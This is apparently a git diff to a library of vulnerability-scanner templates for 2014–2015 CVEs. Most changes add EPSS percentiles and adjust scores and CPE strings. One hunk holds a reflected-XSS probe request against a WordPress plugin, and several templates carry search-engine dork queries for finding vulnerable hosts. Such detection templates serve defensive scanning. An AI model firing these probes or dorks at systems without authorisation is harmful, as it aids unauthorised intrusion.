--- a/http/cves/2014/CVE-2014-4550.yaml
+++ b/http/cves/2014/CVE-2014-4550.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00135
cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.47998
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/shortcode-ninja"
diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml
index 40cf362e53..901bacfee3 100644
--- a/http/cves/2014/CVE-2014-4558.yaml
+++ b/http/cves/2014/CVE-2014-4558.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00135
cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.47998
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml
index 40f279eea4..30fad1edf3 100644
--- a/http/cves/2014/CVE-2014-4561.yaml
+++ b/http/cves/2014/CVE-2014-4561.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00098
cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.40032
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml
index bb13a16f9a..48df6c1f55 100644
--- a/http/cves/2014/CVE-2014-4592.yaml
+++ b/http/cves/2014/CVE-2014-4592.yaml
@@ -15,11 +15,15 @@ info:
cvss-score: 6.1
cve-id: CVE-2014-4592
cwe-id: CWE-79
- cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:*:*:*
epss-score: 0.00135
+ cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.47998
metadata:
google-query: inurl:"/wp-content/plugins/wp-planet"
max-request: 2
+ framework: wordpress
+ vendor: czepol
+ product: wp-planet
tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve,unauth
http:
@@ -27,7 +31,6 @@ http:
- |
GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1
Host: {{Hostname}}
-
- |
GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: {{Hostname}}
@@ -51,4 +54,4 @@ http:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml
index 4e3bf6b71e..b2063f1f48 100644
--- a/http/cves/2014/CVE-2014-4940.yaml
+++ b/http/cves/2014/CVE-2014-4940.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.03891
cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.90789
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/tera-charts"
diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml
index 0282c870f2..fa531125a7 100644
--- a/http/cves/2014/CVE-2014-4942.yaml
+++ b/http/cves/2014/CVE-2014-4942.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-200
epss-score: 0.01024
cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.81955
metadata:
max-request: 1
framework: wordpress
@@ -49,4 +50,4 @@ http:
part: body
group: 1
regex:
- - '>PHP Version <\/td>([0-9.]+)'
\ No newline at end of file
+ - '>PHP Version <\/td> | ([0-9.]+)'
diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml
index c1a1eb9827..0bfb089b37 100644
--- a/http/cves/2014/CVE-2014-5111.yaml
+++ b/http/cves/2014/CVE-2014-5111.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.0445
cpe: cpe:2.3:a:netfortris:trixbox:-:*:*:*:*:*:*:*
+ epss-percentile: 0.91352
metadata:
max-request: 1
vendor: netfortris
diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml
index e19eb46c6f..073c8176a6 100644
--- a/http/cves/2014/CVE-2014-5258.yaml
+++ b/http/cves/2014/CVE-2014-5258.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01386
cpe: cpe:2.3:a:webedition:webedition_cms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.84675
metadata:
max-request: 1
vendor: webedition
diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml
index d8c0b70213..04e9cf3415 100644
--- a/http/cves/2014/CVE-2014-5368.yaml
+++ b/http/cves/2014/CVE-2014-5368.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.08268
cpe: cpe:2.3:a:wp_content_source_control_project:wp_content_source_control:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.93532
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/wp-source-control"
diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml
index 1da67e0e8b..e9b18dcd77 100644
--- a/http/cves/2014/CVE-2014-6271.yaml
+++ b/http/cves/2014/CVE-2014-6271.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-78
epss-score: 0.97566
cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99997
metadata:
max-request: 8
vendor: gnu
diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml
index 02ecc35cd5..8aaa5d7bf8 100644
--- a/http/cves/2014/CVE-2014-6287.yaml
+++ b/http/cves/2014/CVE-2014-6287.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: 'CVE-2014-6287'
cwe-id: CWE-94
- epss-score: 0.97315
+ epss-score: 0.97289
cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99787
metadata:
max-request: 1
shodan-query: http.favicon.hash:2124459909
diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml
index 382394a121..e812f8b67f 100644
--- a/http/cves/2014/CVE-2014-6308.yaml
+++ b/http/cves/2014/CVE-2014-6308.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.0922
cpe: cpe:2.3:a:osclass:osclass:*:*:*:*:*:*:*:*
+ epss-percentile: 0.93887
metadata:
max-request: 1
vendor: osclass
diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml
index ad862af9f6..5a61b9f4e3 100644
--- a/http/cves/2014/CVE-2014-8676.yaml
+++ b/http/cves/2014/CVE-2014-8676.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00195
cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:*
+ epss-percentile: 0.56565
metadata:
max-request: 1
vendor: soplanning
diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml
index d6b223ccc6..6b33f10350 100644
--- a/http/cves/2014/CVE-2014-8682.yaml
+++ b/http/cves/2014/CVE-2014-8682.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-89
epss-score: 0.00808
cpe: cpe:2.3:a:gogits:gogs:*:*:*:*:*:*:*:*
+ epss-percentile: 0.79567
metadata:
max-request: 1
shodan-query: title:"Sign In - Gogs"
diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml
index d4f0792a08..8586fec882 100644
--- a/http/cves/2014/CVE-2014-8799.yaml
+++ b/http/cves/2014/CVE-2014-8799.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.17844
cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.9547
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/dukapress"
diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml
index d3dc1bd90d..bfe13e09f4 100644
--- a/http/cves/2014/CVE-2014-9094.yaml
+++ b/http/cves/2014/CVE-2014-9094.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.83554
cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.98005
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/dzs-videogallery"
diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml
index d7b274ff66..e5508e72fe 100644
--- a/http/cves/2014/CVE-2014-9119.yaml
+++ b/http/cves/2014/CVE-2014-9119.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 5
cve-id: CVE-2014-9119
cwe-id: CWE-22
- epss-score: 0.35426
+ epss-score: 0.30825
cpe: cpe:2.3:a:db_backup_project:db_backup:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.96385
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml
index 430d3ccab7..23d3589182 100644
--- a/http/cves/2014/CVE-2014-9444.yaml
+++ b/http/cves/2014/CVE-2014-9444.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00287
cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.64821
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml
index efe8af9c8a..101755d6d4 100644
--- a/http/cves/2014/CVE-2014-9606.yaml
+++ b/http/cves/2014/CVE-2014-9606.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00102
cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
+ epss-percentile: 0.40937
metadata:
max-request: 1
vendor: netsweeper
diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml
index be37a7d4c3..59db856637 100644
--- a/http/cves/2014/CVE-2014-9607.yaml
+++ b/http/cves/2014/CVE-2014-9607.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00102
cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:*
+ epss-percentile: 0.40937
metadata:
max-request: 1
vendor: netsweeper
diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml
index 3a47ae981f..b2da0ce5fd 100644
--- a/http/cves/2014/CVE-2014-9608.yaml
+++ b/http/cves/2014/CVE-2014-9608.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00102
cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
+ epss-percentile: 0.40937
metadata:
max-request: 1
vendor: netsweeper
@@ -49,4 +50,4 @@ http:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml
index 7bf486ae6c..f13c56b0c8 100644
--- a/http/cves/2014/CVE-2014-9609.yaml
+++ b/http/cves/2014/CVE-2014-9609.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2014-9609
cwe-id: CWE-22
- epss-score: 0.00149
+ epss-score: 0.00212
cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
+ epss-percentile: 0.5835
metadata:
max-request: 1
vendor: netsweeper
diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml
index dc03faeab2..f531e1854a 100644
--- a/http/cves/2014/CVE-2014-9614.yaml
+++ b/http/cves/2014/CVE-2014-9614.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-798
epss-score: 0.01433
cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
+ epss-percentile: 0.84911
metadata:
max-request: 1
vendor: netsweeper
diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml
index 5a9e25679e..66c682b9b6 100644
--- a/http/cves/2014/CVE-2014-9615.yaml
+++ b/http/cves/2014/CVE-2014-9615.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00102
cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.4:*:*:*:*:*:*:*
+ epss-percentile: 0.40937
metadata:
max-request: 1
vendor: netsweeper
diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml
index a68c2b43f9..ec6b679ec6 100644
--- a/http/cves/2014/CVE-2014-9617.yaml
+++ b/http/cves/2014/CVE-2014-9617.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00109
cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
+ epss-percentile: 0.43264
metadata:
max-request: 1
vendor: netsweeper
diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml
index 88ebfddbca..995e5dd042 100644
--- a/http/cves/2014/CVE-2014-9618.yaml
+++ b/http/cves/2014/CVE-2014-9618.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2014-9618
cwe-id: CWE-287
- epss-score: 0.04784
+ epss-score: 0.03433
cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
+ epss-percentile: 0.90239
metadata:
max-request: 1
vendor: netsweeper
diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml
index 437fa3f2be..7dad531c2f 100644
--- a/http/cves/2015/CVE-2015-0554.yaml
+++ b/http/cves/2015/CVE-2015-0554.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-264
epss-score: 0.0196
cpe: cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:*
+ epss-percentile: 0.87242
metadata:
max-request: 1
vendor: adb
diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml
index e8edfddced..5c15e3f477 100644
--- a/http/cves/2015/CVE-2015-1000005.yaml
+++ b/http/cves/2015/CVE-2015-1000005.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2015-1000005
cwe-id: CWE-22
- epss-score: 0.03864
+ epss-score: 0.04406
cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.91313
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml
index c7358e9464..72450b6d93 100644
--- a/http/cves/2015/CVE-2015-1000010.yaml
+++ b/http/cves/2015/CVE-2015-1000010.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-284
epss-score: 0.02653
cpe: cpe:2.3:a:simple-image-manipulator_project:simple-image-manipulator:1.0:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.8903
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml
index 6e9e63b3af..7ad12951f0 100644
--- a/http/cves/2015/CVE-2015-1000012.yaml
+++ b/http/cves/2015/CVE-2015-1000012.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-200
epss-score: 0.00773
cpe: cpe:2.3:a:mypixs_project:mypixs:0.3:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.79053
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/mypixs"
diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml
index 4836458e9d..ef4c816d77 100644
--- a/http/cves/2015/CVE-2015-1427.yaml
+++ b/http/cves/2015/CVE-2015-1427.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2015-1427
cwe-id: CWE-284
- epss-score: 0.89427
+ epss-score: 0.88469
cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98266
metadata:
max-request: 2
vendor: elasticsearch
diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml
index fcd5595c82..d0a76c58a3 100644
--- a/http/cves/2015/CVE-2015-1503.yaml
+++ b/http/cves/2015/CVE-2015-1503.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2015-1503
cwe-id: CWE-22
- epss-score: 0.95625
+ epss-score: 0.94041
cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98821
metadata:
max-request: 2
shodan-query: title:"icewarp"
diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml
index a9e3963ea6..9ef0fe02c1 100644
--- a/http/cves/2015/CVE-2015-1579.yaml
+++ b/http/cves/2015/CVE-2015-1579.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.92959
cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.98662
metadata:
max-request: 2
google-query: inurl:/wp-content/plugins/revslider
diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml
index 50e22d49d1..c243cc6aa6 100644
--- a/http/cves/2015/CVE-2015-1880.yaml
+++ b/http/cves/2015/CVE-2015-1880.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00201
cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.57316
metadata:
max-request: 1
vendor: fortinet
diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml
index df78b925c1..c2df2187cb 100644
--- a/http/cves/2015/CVE-2015-2067.yaml
+++ b/http/cves/2015/CVE-2015-2067.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01338
cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:*
+ epss-percentile: 0.84395
metadata:
max-request: 1
shodan-query: http.component:"Magento"
diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml
index 67480a5b4d..2052e941f6 100644
--- a/http/cves/2015/CVE-2015-2068.yaml
+++ b/http/cves/2015/CVE-2015-2068.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00146
cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:*
+ epss-percentile: 0.49807
metadata:
max-request: 1
shodan-query: http.component:"Magento"
diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml
index e4f753a49f..725bfd9396 100644
--- a/http/cves/2015/CVE-2015-2080.yaml
+++ b/http/cves/2015/CVE-2015-2080.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-200
epss-score: 0.95465
cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*
+ epss-percentile: 0.99111
metadata:
max-request: 1
vendor: fedoraproject
diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml
index ef0c99aad9..14ee966d91 100644
--- a/http/cves/2015/CVE-2015-2166.yaml
+++ b/http/cves/2015/CVE-2015-2166.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5
cve-id: CVE-2015-2166
cwe-id: CWE-22
- epss-score: 0.16846
+ epss-score: 0.27262
cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:*
+ epss-percentile: 0.96165
metadata:
max-request: 1
vendor: ericsson
diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml
index b5536d0979..2df735a008 100644
--- a/http/cves/2015/CVE-2015-2196.yaml
+++ b/http/cves/2015/CVE-2015-2196.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-89
epss-score: 0.0093
cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.81015
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml
index 23c9e7585f..bbdd2a9f0d 100644
--- a/http/cves/2015/CVE-2015-2755.yaml
+++ b/http/cves/2015/CVE-2015-2755.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-352
epss-score: 0.02569
cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.88871
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml
index 76c4827d40..ab862a96ad 100644
--- a/http/cves/2015/CVE-2015-2807.yaml
+++ b/http/cves/2015/CVE-2015-2807.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 4.3
cve-id: CVE-2015-2807
cwe-id: CWE-79
- epss-score: 0.00535
+ epss-score: 0.00665
cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.77092
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/navis-documentcloud"
diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml
index 770188294b..e0f21c4d59 100644
--- a/http/cves/2015/CVE-2015-2863.yaml
+++ b/http/cves/2015/CVE-2015-2863.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00626
cpe: cpe:2.3:a:kaseya:virtual_system_administrator:*:*:*:*:*:*:*:*
+ epss-percentile: 0.76316
metadata:
max-request: 2
vendor: kaseya
diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml
index 4a464ad160..e19fb5b916 100644
--- a/http/cves/2015/CVE-2015-2996.yaml
+++ b/http/cves/2015/CVE-2015-2996.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.77754
cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97813
metadata:
max-request: 2
shodan-query: http.favicon.hash:1540720428
diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml
index f94d264073..7ea064597d 100644
--- a/http/cves/2015/CVE-2015-3035.yaml
+++ b/http/cves/2015/CVE-2015-3035.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.58993
cpe: cpe:2.3:o:tp-link:tl-wr841n_\(9.0\)_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97296
metadata:
max-request: 1
shodan-query: http.title:"TP-LINK"
diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml
index 18ead65f29..66b111e85e 100644
--- a/http/cves/2015/CVE-2015-3224.yaml
+++ b/http/cves/2015/CVE-2015-3224.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-284
epss-score: 0.93656
cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98766
metadata:
max-request: 1
vendor: rubyonrails
diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml
index 4c31fc255f..e36c5d189c 100644
--- a/http/cves/2015/CVE-2015-3337.yaml
+++ b/http/cves/2015/CVE-2015-3337.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.96596
cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99448
metadata:
max-request: 1
vendor: elasticsearch
diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml
index e3098e998d..c6db360871 100644
--- a/http/cves/2015/CVE-2015-3648.yaml
+++ b/http/cves/2015/CVE-2015-3648.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.02644
cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:*
+ epss-percentile: 0.89012
metadata:
max-request: 1
vendor: montala
diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml
index 3eecd182e4..8f0f407892 100644
--- a/http/cves/2015/CVE-2015-3897.yaml
+++ b/http/cves/2015/CVE-2015-3897.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5
cve-id: CVE-2015-3897
cwe-id: CWE-22
- epss-score: 0.88702
+ epss-score: 0.83225
cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97993
metadata:
max-request: 2
vendor: bonitasoft
diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml
index bf5d521a22..d7ef97134e 100644
--- a/http/cves/2015/CVE-2015-4050.yaml
+++ b/http/cves/2015/CVE-2015-4050.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-284
epss-score: 0.00847
cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:*
+ epss-percentile: 0.8003
metadata:
max-request: 1
vendor: sensiolabs
diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml
index d9b753b1b6..49cde91888 100644
--- a/http/cves/2015/CVE-2015-4062.yaml
+++ b/http/cves/2015/CVE-2015-4062.yaml
@@ -21,6 +21,7 @@ info:
cwe-id: CWE-89
epss-score: 0.03336
cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.90106
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml
index da1dbe7d65..c3d85e635d 100644
--- a/http/cves/2015/CVE-2015-4063.yaml
+++ b/http/cves/2015/CVE-2015-4063.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 3.5
cve-id: CVE-2015-4063
cwe-id: CWE-79
- epss-score: 0.04125
+ epss-score: 0.04016
cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.90916
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml
index a93254e739..0cb08aab5d 100644
--- a/http/cves/2015/CVE-2015-4074.yaml
+++ b/http/cves/2015/CVE-2015-4074.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00598
cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\!:*:*
+ epss-percentile: 0.75681
metadata:
max-request: 1
framework: joomla\!
diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml
index 7d0779267b..6542233953 100644
--- a/http/cves/2015/CVE-2015-4127.yaml
+++ b/http/cves/2015/CVE-2015-4127.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0034
cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.67772
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml
index a5114ca4a9..0b3a728fd2 100644
--- a/http/cves/2015/CVE-2015-4414.yaml
+++ b/http/cves/2015/CVE-2015-4414.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5
cve-id: CVE-2015-4414
cwe-id: CWE-22
- epss-score: 0.10802
+ epss-score: 0.11221
cpe: cpe:2.3:a:se_html5_album_audio_player_project:se_html5_album_audio_player:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.94441
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player"
diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml
index 26af7a5705..8da1570978 100644
--- a/http/cves/2015/CVE-2015-4632.yaml
+++ b/http/cves/2015/CVE-2015-4632.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.05668
cpe: cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9233
metadata:
max-request: 1
vendor: koha
diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml
index a7328d18c6..455a73ce0d 100644
--- a/http/cves/2015/CVE-2015-4666.yaml
+++ b/http/cves/2015/CVE-2015-4666.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.03324
